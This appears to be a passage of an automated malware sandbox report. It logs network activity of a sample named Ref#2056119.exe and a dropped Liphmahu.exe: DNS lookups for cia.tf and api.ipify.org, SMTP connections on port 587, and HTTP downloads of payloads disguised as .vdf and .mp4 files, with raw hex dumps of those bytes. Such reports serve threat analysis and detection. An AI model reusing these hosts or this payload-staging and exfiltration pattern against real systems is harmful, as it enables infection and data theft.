                                                                                Nov 25, 2024 14:48:12.605396986 CET49757587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:48:12.726057053 CET58749757162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:48:13.003722906 CET58749757162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:48:13.004415035 CET49757587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:48:13.004462004 CET49757587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:48:13.004504919 CET49757587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:48:13.004515886 CET49757587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:48:13.124411106 CET58749757162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:48:13.124470949 CET58749757162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:48:13.124520063 CET58749757162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:48:13.124548912 CET58749757162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:48:13.561058044 CET58749757162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:48:13.610045910 CET49757587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:49:22.141817093 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:49:22.261790037 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:49:22.543203115 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:49:22.543359041 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:49:22.543412924 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:49:22.543441057 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:49:22.663425922 CET58749743162.254.34.31192.168.2.4
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 25, 2024 14:47:21.747036934 CET5362853192.168.2.41.1.1.1
                                                                                Nov 25, 2024 14:47:22.157695055 CET53536281.1.1.1192.168.2.4
                                                                                Nov 25, 2024 14:47:39.324376106 CET5908053192.168.2.41.1.1.1
                                                                                Nov 25, 2024 14:47:39.462318897 CET53590801.1.1.1192.168.2.4
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 25, 2024 14:47:21.747036934 CET192.168.2.41.1.1.10x2be5Standard query (0)cia.tfA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 14:47:39.324376106 CET192.168.2.41.1.1.10x7433Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 25, 2024 14:47:22.157695055 CET1.1.1.1192.168.2.40x2be5No error (0)cia.tf172.67.129.178A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 14:47:22.157695055 CET1.1.1.1192.168.2.40x2be5No error (0)cia.tf104.21.1.182A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 14:47:39.462318897 CET1.1.1.1192.168.2.40x7433No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 14:47:39.462318897 CET1.1.1.1192.168.2.40x7433No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 14:47:39.462318897 CET1.1.1.1192.168.2.40x7433No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                • cia.tf
                                                                                • api.ipify.org
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449737172.67.129.1784437496C:\Users\user\Desktop\Ref#2056119.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-11-25 13:47:23 UTC92OUTGET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1
                                                                                Host: cia.tf
                                                                                Connection: Keep-Alive
                                                                                2024-11-25 13:47:24 UTC960INHTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 13:47:24 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 1127432
                                                                                Connection: close
                                                                                accept-ranges: bytes
                                                                                Cache-Control: public, max-age=0
                                                                                content-disposition: attachment; filename="Dhykdmlsc.vdf"
                                                                                etag: W/"113408-19362e45d6a"
                                                                                last-modified: Mon, 25 Nov 2024 10:35:53 GMT
                                                                                x-powered-by: Express
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFScQUv8YaKrlD96oqijjnNMIckk0QKMfcVU2b1HP%2BRSNvgWYbbkqCWIlob8DoZLkUBGZuGot6EWinw0rJT8ULRtt06GlpF0Hl7yyo9lCfMAbkDZD9epJ%2BU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8217234d985e68-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2809&recv_bytes=706&delivery_rate=1731909&cwnd=250&unsent_bytes=0&cid=a35bbbf7927d26d6&ts=1099&x=0"
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: 17 10 9e 68 50 d7 40 e0 46 27 2a 8b 31 0f 2b 36 e9 67 6e 9c 96 60 58 78 bc 6b c3 1d 44 35 20 17 9b 57 f4 42 c1 51 55 05 da 44 cb fc 7a 35 71 c1 7c 03 f9 de 00 c6 1a 63 12 8a 68 e9 38 e3 99 36 dd bd 53 7f 7d 53 30 27 26 0a ce 1b c2 65 f2 bc 2f 70 98 11 98 20 9e b2 c6 78 a9 4d 79 91 fa 11 26 f4 5f c7 14 4b bc 42 d1 8b 1f e3 9f d5 9c 43 cd 7a f4 fb a3 dc a0 4a f3 39 b4 e2 49 22 37 6f 1c 06 bb 56 e0 f2 43 d9 75 7d c1 cd 8d d7 be 14 91 14 44 9d 32 1e cd bb 92 b9 9d b5 56 00 85 18 5f 77 b3 68 bc 3a 60 72 9f e2 85 67 a1 99 0d 0d af a6 56 89 8c 03 e5 35 a1 60 62 8d 2c 09 e5 27 3f 1c fe 74 c4 9a 15 b4 16 0e 68 d5 67 7f df 9f 6b d9 f9 7f 9f 76 41 ad d5 55 d0 c2 11 6f f1 36 b2 aa 8c 1b e6 8b df 4f 1a fc 58 68 d1 10 67 5a 31 97 22 bd 50 4f 9c 0f e6 77 e8 56 8b 23 d0
                                                                                Data Ascii: hP@F'*1+6gn`XxkD5 WBQUDz5q|ch86S}S0'&e/p xMy&_KBCzJ9I"7oVCu}D2V_wh:`rgV5`b,'?thgkvAUo6OXhgZ1"POwV#
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: 93 01 45 3f 3a df 5a 1e 21 58 f9 99 06 fa 20 2c 8a ea 47 3d 19 42 04 e9 0f 34 4b e2 28 b7 ef a0 e8 2b 1a 95 a6 88 d1 30 cd 63 9e 64 19 b9 dd 83 ef 28 cd 03 1d 06 e7 85 9d 10 12 b8 5f 33 24 64 87 cc c7 f7 5a 9c 26 df 23 c6 01 ae 55 a2 5e 37 12 f7 f8 7f 6b 81 62 43 eb 51 76 9e cf e1 5e dd b9 31 03 55 0c 09 9b 14 ab 20 d8 75 61 00 7a 18 d1 5a 28 f0 4d 2e ad c3 d7 7f 75 65 00 fd b0 9d ff 50 ad a0 8e 9a 24 39 b6 f5 21 ea cb 79 80 39 84 aa 38 8f 96 c9 24 eb f3 5b d0 5d 74 f3 f2 9e 3d 7a 85 80 f5 02 4b 10 9f 18 ef 62 11 fd b7 16 77 83 cc a9 6f cf e5 ef be 2c f7 1d 3e ef 06 d1 2b 06 b4 17 68 c1 36 a9 1e bc ff 6c 12 94 53 5e d0 31 0b 7a 05 61 58 de 62 5d 53 1c 8b a5 72 24 d2 a8 1e ff a6 06 15 01 2d cb 03 73 bd 82 aa 9a c3 5e d1 4a 8b 3c f3 10 b2 1d 1e 7f 61 f7 fb
                                                                                Data Ascii: E?:Z!X ,G=B4K(+0cd(_3$dZ&#U^7kbCQv^1U uazZ(M.ueP$9!y98$[]t=zKbwo,>+h6lS^1zaXb]Sr$-s^J<a
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: 3b ea a1 9e 0d 6f 07 d7 99 ea ec 37 7f 8f b6 4c eb a1 f1 74 53 c7 23 66 dc 44 8e b8 6f 56 bc c3 14 be c7 40 6e b2 83 f0 ce 11 27 3f fa 2e c5 22 ab cd e9 a8 97 50 5c 71 19 e0 57 e5 24 36 6e 1f a6 98 3c 4c 24 4a f3 7f 96 b0 64 93 b1 77 4b d8 de 53 00 33 93 16 a5 5d 71 28 f6 e9 21 76 c9 ac 0a 01 67 18 b1 8f c8 56 79 0d 4e 9c 03 36 bc 84 fe 2e 73 0e a6 9d bc 36 f3 9d 02 7a 3e 04 77 b8 85 3b 09 96 05 ee 17 ff 2b be 55 e4 ff 8e aa 43 e2 41 db 06 b7 3f c8 7f 74 70 92 b6 35 e2 1c e2 77 9c e9 0a ed 69 7e 13 47 9b f9 f4 d2 56 ca 29 9f 51 eb 5d 16 94 3b 5c c0 71 8e 3a bc e3 7c cf 08 95 62 56 5e 16 19 4c 84 b0 b4 d6 45 39 f4 ff 05 a1 c1 5e d7 10 0d b0 bf 46 80 b5 d3 40 e7 50 55 39 16 e8 75 f2 a2 19 9b c8 04 a3 e0 02 91 a6 da 3f ee fd 95 7f 19 d4 d6 e1 bb 2e 17 f7 5b
                                                                                Data Ascii: ;o7LtS#fDoV@n'?."P\qW$6n<L$JdwKS3]q(!vgVyN6.s6z>w;+UCA?tp5wi~GV)Q];\q:|bV^LE9^F@PU9u?.[
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: fc b4 07 d6 a4 55 88 ca 83 c3 38 8b 69 35 ab cf d4 bf 81 29 19 b4 e3 d2 6a ef a8 1e 81 01 a1 65 81 99 40 3e 46 bd 47 6e f9 5d 5a cd df df 7e d8 ce b3 c5 81 11 26 fb 55 24 71 8d fe 85 d9 49 d0 42 a4 7b 0f e8 d4 51 fb 3b fe 79 05 c7 ac 77 25 70 f5 13 4e b9 22 46 5a 76 ee 08 85 8f 11 44 2c 03 fb 50 38 b3 f5 1c a4 7f 40 f0 76 2b fe db 84 42 1b 23 62 61 c3 8e 70 23 fe 78 c2 2c 16 4a 3b a5 c1 d8 1e b8 3b 49 23 04 1a f3 b2 62 76 27 ca 45 49 c1 e3 82 4b a0 ad ee 5d 2b 91 31 25 e6 e4 0b 3a ab a0 ed be 13 aa 41 8e ca 60 31 12 b1 98 41 83 c6 f4 a3 d5 94 58 6a fc 3a 7c 79 b6 c3 00 0d c0 65 c7 fe ff ca 63 89 9f d1 75 65 72 e9 67 c7 fd f3 c8 60 eb e3 1f cc 87 d4 a6 83 b8 f3 1a 64 e8 69 d6 7a ea 4b 55 07 21 dc bf 39 f0 8e f1 20 f3 02 4c 37 ee d7 34 af 26 0c e2 ff 94 2c
                                                                                Data Ascii: U8i5)je@>FGn]Z~&U$qIB{Q;yw%pN"FZvD,P8@v+B#bap#x,J;;I#bv'EIK]+1%:A`1AXj:|yecuerg`dizKU!9 L74&,
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: 50 a2 d6 dd 52 51 fc 85 4d 28 dd 8e 83 aa fa 6f e4 ff 39 34 c5 bc d2 a4 04 4c 2c 91 c1 ca 30 8e ba db 8a f1 08 fb 4c ee 41 43 8c bb e7 72 ed 56 fc 14 1f bd 65 cd 8b b5 a5 2e b3 ef c3 7c fe 2f e2 b6 39 53 94 60 d4 93 9f cf 9e bc 82 b2 19 f3 1e f8 34 1f fd 35 f5 57 d6 0c ad 02 5b 85 f0 20 1c ff 73 93 33 5f 2f 34 96 2e af e1 83 9b 44 54 aa 29 c0 c5 ca 4a 7e 99 36 dc 3b d4 17 ed 0a 58 f0 1b 37 d4 6f 66 0a 9c 62 75 85 3b 89 aa a2 2f 2f ca de 0b 49 30 8b 09 53 c8 10 84 75 3f 88 fc 0e e7 43 8a 28 cd c3 87 15 86 cf ab ed b2 31 5f 9c 36 ef cc 7a 7d 6b 52 70 d6 1d 99 95 bd b5 68 f8 47 dc 9a 53 0e dc 9e bd c9 a2 25 98 fd 70 db 33 ed 10 3c 4d 18 03 6b 95 68 22 ea 13 85 a3 1a 90 a1 f9 16 02 a2 0d 34 a9 1b 66 9f 08 56 55 25 21 d5 34 d1 01 58 58 cc 72 44 fb 87 74 79 7d
                                                                                Data Ascii: PRQM(o94L,0LACrVe.|/9S`45W[ s3_/4.DT)J~6;X7ofbu;//I0Su?C(1_6z}kRphGS%p3<Mkh"4fVU%!4XXrDty}
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: b4 dc b8 7d 74 d3 b9 6e 05 4c 21 bc b5 33 09 cf 39 5e bd 8a 4a 8c 5b c6 a8 32 e8 2e 07 6a ae 0a 7f 77 a9 8e f0 c3 bb 3c 02 ae 50 e7 5b 4c 62 a2 1d ac 38 d7 66 df ae 9d 7e 9b 7d 15 24 d1 e5 96 23 e7 65 45 d2 44 09 a3 8f 81 cd 52 5e 4b 45 7f 54 f9 55 f5 b6 bd a4 4a 09 f4 57 77 2f 03 e6 32 58 33 b0 f8 02 0a 60 28 ee 5a a2 39 dd 60 30 91 58 59 48 a2 d5 0b ca cf d4 11 99 e1 e6 69 f1 f2 d2 7a c1 08 97 e6 c6 a0 b1 74 a8 3f c8 17 3c 36 7b a7 b7 8f 40 f5 6e ec c0 b1 3e 4f eb 3d ad d9 3e 10 dd a6 d9 55 ff 9f f9 dd 21 f7 4e 59 16 d8 91 2f ff fc 83 c7 be 60 e4 35 23 89 96 30 9c 4a d2 ac 08 d0 50 6c a3 d2 7c 3e 2d f5 9e 7a e4 3d 09 3a e1 dd 0b 53 20 e1 6b af eb 0e d9 c5 3f 0b 47 cf 15 62 b7 d0 94 2a 8f 6b 04 11 f5 c6 3a af ea 22 17 3f 75 ec 20 5d 30 e3 b5 17 be 07 76
                                                                                Data Ascii: }tnL!39^J[2.jw<P[Lb8f~}$#eEDR^KETUJWw/2X3`(Z9`0XYHizt?<6{@n>O=>U!NY/`5#0JPl|>-z=:S k?Gb*k:"?u ]0v
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: aa 0e 83 ee 9a 85 da 24 3d e5 91 f1 19 e2 27 78 52 b3 5c 8b b2 13 5b 65 a8 c8 64 b2 c5 33 78 fa 9a d9 b2 02 ff 56 74 3a 49 b3 09 1d 01 01 22 ae 8c 60 68 f8 26 8e 6b 51 8d 23 90 ff 37 19 3b 3d 79 2a 64 63 06 4e a4 b8 83 57 73 9a d7 68 05 e2 82 68 e8 01 e8 08 aa 2d 53 80 51 b0 14 e3 4b ac 61 a2 10 11 50 00 43 1d 8b 5f 9b 55 55 26 3d ca 55 24 23 ca 13 2e b0 45 44 38 c1 b9 7a 4e 59 db af 71 60 46 c0 e3 bc 3f 25 28 32 d1 3e ad ad de f4 20 00 9f ed 0c 9e 7a aa 79 43 b6 d2 e0 56 83 8f 2f f0 b2 d1 a1 b7 6c 4c 9c 14 75 d7 c2 8d 7e 3a 67 c4 a4 37 cc 76 ba 1e 08 86 c3 d9 a8 a5 3c 1c aa 94 a5 4a 16 05 b8 3a 78 e4 31 79 64 37 f1 1f d3 a8 32 46 7c 88 b1 86 fe 9e 88 a6 45 4b 51 03 d7 c6 65 54 dc de 22 21 1a de b7 26 b9 1c 8f 08 42 05 af 38 6d 95 4a 50 b8 a1 44 10 d5 36
                                                                                Data Ascii: $='xR\[ed3xVt:I"`h&kQ#7;=y*dcNWshh-SQKaPC_UU&=U$#.ED8zNYq`F?%(2> zyCV/lLu~:g7v<J:x1yd72F|EKQeT"!&B8mJPD6
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: 16 0b 1d 99 4a 48 e9 5d 9d 55 23 3a 03 e9 95 12 64 42 30 6c 29 10 42 d5 db ff 8d ef 69 e2 37 6a 39 44 1d 37 d8 9e 4e bd e7 58 b2 f8 0a a6 de e8 14 6a f0 a5 6f 86 44 6f 0a c4 1e b2 28 b7 a5 8c d6 f8 53 62 14 72 25 54 ac 70 b4 10 28 91 fc bb 46 f3 d2 c4 3c a2 fd a5 c5 60 aa 64 93 de 58 03 ed 15 5a 50 f8 4b a9 63 8f 6b 86 73 ac 56 7e 3c f8 2b e5 8e 03 2d 2e 4c 07 ac b1 09 c4 28 d5 de b3 62 03 4a 19 d1 10 ee 2a c7 62 f7 df 5d 97 36 0d d1 a9 a1 d2 d8 94 75 ce 6f 6f 68 90 77 a3 83 2c 24 a9 65 2e 33 df 87 50 39 10 79 20 15 8b 81 ef 45 9e ca 63 1b 7a 68 07 a7 c6 fc 59 f8 21 7f 6e 2a 77 eb d1 a5 e3 8a cc ef 5b 69 68 75 ad ea e3 96 9b 14 0f 36 d2 2b 60 00 84 60 ae b5 39 da 23 cc 4a 90 2a c2 78 ca ba 56 80 ae 57 12 cc c3 13 72 96 12 ec 27 e3 f1 45 73 58 e7 e3 26 68
                                                                                Data Ascii: JH]U#:dB0l)Bi7j9D7NXjoDo(Sbr%Tp(F<`dXZPKcksV~<+-.L(bJ*b]6uoohw,$e.3P9y EczhY!n*w[ihu6+``9#J*xVWr'EsX&h
                                                                                2024-11-25 13:47:24 UTC1369INData Raw: 57 e7 4f 69 94 c2 ee 08 1c cf fd 75 50 da 0e 0d d4 02 62 05 8c e8 4e bc 1d e7 99 76 b4 ba cf 2c 87 9c bc 25 09 f3 1c ec 1d 0f 6f 73 49 b2 86 64 3f 6a 56 e2 24 da e9 0d 2e 84 c7 f9 ba 91 71 87 ae 55 86 6d 0b e1 40 32 56 04 18 5b 33 13 ad f8 1b 87 28 e7 02 16 d9 70 10 0f d8 f9 8f 93 b6 6f 26 4e f1 bf 5a bd 99 33 13 7d b7 8e 7d 7e 75 d6 ac 1a 9f 4a f7 97 30 01 f3 1e d3 16 53 e6 bb 6e 49 30 b3 5c d2 54 02 16 32 13 69 42 fc 0b 57 8e 6c e8 d0 01 6f 28 a5 5f bf 31 11 53 cc 8d a5 ac 01 a9 c8 45 e4 26 9f cb 6e 01 4b 53 c5 24 e8 35 c7 f0 ec 08 6a 4f 74 cb c0 45 54 a8 9d d8 72 79 02 7a a7 27 63 5c 48 12 37 a0 81 c5 11 87 6d 04 5f 3b 8c 61 2f 4d a6 bf 69 8a c5 8d dc 1a 3b 22 86 ae af 61 41 0c a4 8c 0e 1d 55 e1 84 2c 17 a1 4c d1 a7 ee 22 5b fa 2b 69 06 c4 76 26 b1 a9
                                                                                Data Ascii: WOiuPbNv,%osId?jV$.qUm@2V[3(po&NZ3}}~uJ0SnI0\T2iBWlo(_1SE&nKS$5jOtETryz'c\H7m_;a/Mi;"aAU,L"[+iv&
                                                                                2024-11-25 13:47:24 UTC731INData Raw: 3b 90 16 08 a3 a0 6b 37 a2 c2 52 43 5b 4a 81 ad 36 48 6f d2 1a 4f ed 8d 04 d6 29 fe 5f fd 6c 1d 2d aa 92 2d 49 7b c8 0e 86 93 e0 55 3e 67 7c 7c e0 b5 96 57 da f0 5d d4 98 84 91 71 69 e3 7d 8b a7 af cc 27 0b e5 a9 a1 2d 82 57 ee a3 87 b6 d8 fb 28 e2 b7 f5 0d e4 e0 23 86 a2 ff a6 8f f7 73 6d 85 e4 f7 3e 18 a7 f7 bb 7c bb 2f d1 e2 ee bf 4c e8 36 d5 49 59 e7 ec 20 c5 3b 93 cb 14 6e 4c ac d5 ee 6d 9b 42 28 4d 06 e4 cc cd 92 15 99 72 4d 58 18 1c 3d 86 c9 04 55 0f e4 15 ba ef d5 c4 e5 20 70 80 1e 46 ff 7b 23 f8 84 37 ee b3 e7 23 17 63 92 33 e6 58 32 04 68 62 0d 3c 96 48 cd 07 1b 00 4f 91 4b 86 09 8b b3 37 4b c9 fb 23 77 92 f2 d3 d6 8a b5 39 14 57 f2 4a 93 79 47 97 03 73 a0 20 44 03 f9 99 88 f3 71 4c e8 b1 ca 53 2d 42 72 41 3e 3d d7 c5 2c 94 4c c8 03 6f ce 8a 49
                                                                                Data Ascii: ;k7RC[J6HoO)_l--I{U>g||W]qi}'-W(#sm>|/L6IY ;nLmB(MrMX=U pF{#7#c3X2hb<HOK7K#w9WJyGs DqLS-BrA>=,LoI


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449739172.67.129.1784437852C:\Users\user\AppData\Local\Temp\Liphmahu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-11-25 13:47:39 UTC92OUTGET /417440cce6502c1c57308172e9826dec.mp4 HTTP/1.1
                                                                                Host: cia.tf
                                                                                Connection: Keep-Alive
                                                                                2024-11-25 13:47:40 UTC961INHTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 13:47:40 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 958472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=14400
                                                                                content-disposition: attachment; filename="Erscr.mp4"
                                                                                etag: W/"ea008-19362e2e62c"
                                                                                last-modified: Mon, 25 Nov 2024 10:34:17 GMT
                                                                                x-powered-by: Express
                                                                                CF-Cache-Status: REVALIDATED
                                                                                Accept-Ranges: bytes
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BqsovKZAwX7vRayT%2Bs5qStkx5p3ortI8sUkgU4Cmm7UH4W5RvfnBzK0m92tv9MeYOEYXukas0i0F93GqAv0if1YdriLpc54TtM%2FRNutVdJomJYVbiHqgbP8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8217878cf58c0f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2002&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2808&recv_bytes=706&delivery_rate=1416787&cwnd=213&unsent_bytes=0&cid=eac42314c9c8cb91&ts=781&x=0"
                                                                                2024-11-25 13:47:40 UTC408INData Raw: 18 97 a6 18 25 50 a5 1d e9 1d 0c c1 78 7f e5 64 91 44 9c 37 53 f6 28 77 08 35 29 a5 19 5d 43 6a 8c 80 58 6f 08 28 e9 b2 1d 79 f3 12 d1 4f 7a 51 90 52 be 17 50 7a 46 e4 aa 35 bc c4 14 e1 62 06 68 a2 38 81 69 a3 fb 35 64 9b c1 92 7b 31 f8 72 d3 e0 81 ff 8c 5f 72 a8 f5 c5 aa fc 7f eb 1c 45 01 8b 0d 4a 2e 75 87 34 f7 e8 05 b7 c7 f0 f6 0b 13 c8 3f 0c aa 06 8f 35 a1 c3 5e ae 8a b1 f2 af e4 fb a7 12 32 99 8f 5d a8 8a 17 77 17 6a 20 52 9c 99 e3 f8 30 7c b9 e4 17 8a d8 4f 34 95 2f c8 dc 85 d7 9f 7e 09 d9 7e a7 a9 f6 54 2d e4 a6 a2 4c f0 66 7d 00 88 64 c7 5f 7e e8 96 c6 ab 09 bb 0c 72 7c ec f9 c4 36 fe b9 7f 92 3e 6b 55 41 35 57 04 eb 74 8a 30 25 7e 6d 2f 7c 29 72 4d d0 52 e8 93 0b 41 a0 d6 83 82 a3 32 9e 9a db 5c e7 39 a7 e5 a3 8c a4 a0 49 1f 1a 46 6e a7 db e9 ae
                                                                                Data Ascii: %PxdD7S(w5)]CjXo(yOzQRPzF5bh8i5d{1r_rEJ.u4?5^2]wj R0|O4/~~T-Lf}d_~r|6>kUA5Wt0%~m/|)rMRA2\9IFn
                                                                                2024-11-25 13:47:40 UTC1369INData Raw: f9 a7 1e ab f5 ee 9c 60 87 a3 bf 8b 66 34 c8 99 3d df b8 ed da 6f 2b fc c8 7c 62 67 3a b6 98 5c 3b 7e e8 5b 03 18 cc b3 58 30 bf 16 89 41 c0 c5 ee 47 0a 43 bf 57 ed 9b 0c 9a 6b 52 8f 31 af 4b 14 23 fd 55 e2 ce 55 c3 e1 ba f3 86 78 25 56 fa 72 d1 d3 45 30 f1 df 75 4d 0f e4 06 71 1b f8 da 49 30 0a 4f bd a2 76 cd c6 40 8f 54 0a 97 6f 59 9e e8 bb 38 d4 0a cb 14 09 17 30 9e c7 ef 88 76 90 6d 7e 87 1b 2c 7c e7 9d 8d e8 22 3f 1e a2 64 de 85 0b 09 e2 38 5c 19 3b 7e d7 5f 6a b9 d4 f8 39 8c 93 36 5b 72 ac 5b d4 cf ee 66 e8 17 bf 09 24 a7 02 83 dd 43 2e f4 0f cd f4 ed 38 b4 90 dd 4b 75 86 dc ee 00 c0 81 a6 7f 6e 69 f6 ff 9a f9 c2 3e eb e5 82 6e 9a e5 d2 0d 23 93 42 7f ba 16 ce 69 c9 50 5e 0e 9f 23 d1 3c 84 00 91 9e b1 2b f8 06 9a f0 d6 96 eb e8 cc cc 77 72 6e 2e 26
                                                                                Data Ascii: `f4=o+|bg:\;~[X0AGCWkR1K#UUx%VrE0uMqI0Ov@ToY80vm~,|"?d8\;~_j96[r[f$C.8Kuni>n#BiP^#<+wrn.&
                                                                                2024-11-25 13:47:40 UTC1369INData Raw: c1 1b b2 3a e3 f3 21 1a c3 6d 1f 5a 83 2d 37 a3 d1 8d 81 2a 7a 46 e6 06 9a 1f b6 50 03 1c 96 0d 28 be 88 3a 09 6e 58 aa 26 57 4d d5 3d 5b 7a bd 9e 7e 88 20 7f 4b 88 22 86 c8 01 6a 8f 70 bd b1 bb 61 c7 89 e4 f1 8d de 06 d0 4b 35 53 60 9b f1 eb e5 bb f6 e7 40 82 ae 94 c7 d9 0c 29 ae 38 c9 41 37 c8 6a f3 c4 93 2b 2d ec d0 64 a0 92 7c 3f a4 cd 2c 62 c9 ad 40 68 f9 ab 58 71 7c 3a d8 43 35 c5 61 68 38 46 ef 76 62 51 4c b8 0f c1 ec f2 e0 b8 40 e2 9a 0d 94 14 96 e9 40 f6 89 8e ef 82 65 17 23 0a a7 48 18 cb 15 58 5e 07 93 36 ff 86 16 49 d2 43 ad 71 7c c7 25 4c 07 55 33 18 94 0d 43 f3 36 32 e6 69 13 5b 5d 6f ab 36 8c e0 cb a1 24 ed 27 c5 f3 0e f6 04 d7 f2 f4 99 f3 d4 65 43 67 a8 34 2e 5e ad 55 c0 79 73 62 22 8c c6 a2 2d a6 1b 35 d8 8a 53 f3 04 48 b0 ba 0d 0d 87 48
                                                                                Data Ascii: :!mZ-7*zFP(:nX&WM=[z~ K"jpaK5S`@)8A7j+-d|?,b@hXq|:C5ah8FvbQL@@e#HX^6ICq|%LU3C62i[]o6$'eCg4.^Uysb"-5SHH
                                                                                2024-11-25 13:47:40 UTC1369INData Raw: 1e 38 be 05 4a ce 52 e0 84 90 39 b1 28 5e c7 cc 38 a0 af 60 b1 1c 41 40 8e 08 70 31 0d d1 e0 08 c7 86 63 73 04 98 8c e7 9c c3 c5 f4 60 8c 09 de 75 7f 02 c6 ca 34 d3 29 2e b0 ce f0 88 29 e1 94 40 65 57 e3 b5 7e 22 aa b9 10 24 a3 1f fc 38 f4 83 cb ec eb d8 5d a3 10 2e d3 73 78 e9 22 d7 6d d1 9e 16 35 d4 02 3d a3 67 76 bd 6f 3d 2b 4b 49 03 6e d5 4e 2e f4 4d 6d b3 3a ac 2d ae c2 d9 8e 2e 40 45 ab 1b c0 0d df 20 7e f1 be 3a a0 e7 76 9c 14 ba c7 11 09 1f 3f f8 7f eb 02 b6 94 fa e1 02 17 3d 82 1b c5 00 e2 42 b8 b5 83 ae 23 a4 c1 d8 51 bc 8d 1d d9 24 d4 6a b7 7d 5d e8 80 f1 6b 97 17 6e 88 d8 fc 70 d2 7e cf 47 b1 56 9a 32 ea 9c 62 11 74 8a 44 99 f7 c5 68 90 a0 7b 25 9f 21 92 33 f4 d9 b2 cc 7b e8 32 4b d5 fc e8 bc 23 e2 83 48 8a 69 4f 2d 59 b8 3a 16 8a b0 48 60 e8
                                                                                Data Ascii: 8JR9(^8`A@p1cs`u4).)@eW~"$8].sx"m5=gvo=+KInN.Mm:-.@E ~:v?=B#Q$j}]knp~GV2btDh{%!3{2K#HiO-Y:H`
                                                                                2024-11-25 13:47:40 UTC1369INData Raw: 21 13 d4 d7 cc 0e cf 91 6a c7 d3 09 0f 1a f7 6b 10 0e e6 32 99 7f b9 02 1f b0 da 53 cc 28 53 2b 7b 17 52 d5 e8 ac 53 c5 7d 8b dc 2f 7e 3f f1 39 f4 d8 35 bc 47 a3 26 a0 6e 53 46 67 98 92 06 34 81 9e e6 8d 20 6e bc 5c d4 a7 42 23 53 f5 09 18 4f 76 ac 67 05 a3 2f 03 80 51 9a 3e 57 43 32 f5 5c 1c 61 ce 0a dc 06 a6 cd 91 c1 0a 2a 9b 5b 2e 96 03 e4 12 bd 51 1b 22 72 b1 5d 99 aa 1d e3 cd dd f3 fd 23 0d ed 40 14 d4 e7 01 07 dd ad d2 6f f3 7b 7c fc bb df bb ad 08 9e 04 8d 84 d8 ed 80 48 2a 0a 24 49 0f c5 53 f8 51 9f ef f4 f4 af b0 33 cd dc 54 4d e7 bc e9 ca 5e 18 fd be b5 54 09 09 33 5c 22 79 df e5 37 92 8d 20 7e d2 dc 1a d3 71 89 c3 23 a3 f7 08 f7 cf ed d6 ba d0 6a bf e8 25 c7 b8 7d d2 12 67 55 c5 b3 25 89 70 46 79 a5 2a 30 1f 7c 56 7d a4 c3 cd 3a 4a b0 c6 94 f1
                                                                                Data Ascii: !jk2S(S+{RS}/~?95G&nSFg4 n\B#SOvg/Q>WC2\a*[.Q"r]#@o{|H*$ISQ3TM^T3\"y7 ~q#j%}gU%pFy*0|V}:J
